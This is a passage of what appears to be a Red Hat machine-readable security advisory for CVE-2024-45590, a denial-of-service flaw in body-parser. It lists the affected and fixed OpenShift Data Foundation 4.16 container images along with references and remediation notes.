"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45590", }, { category: "external", summary: "RHBZ#2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45590", url: "https://www.cve.org/CVERecord?id=CVE-2024-45590", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45590", }, { category: "external", summary: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", url: "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce", }, { category: "external", summary: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", url: "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7", }, ], release_date: "2024-09-10T16:15:21.083000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", 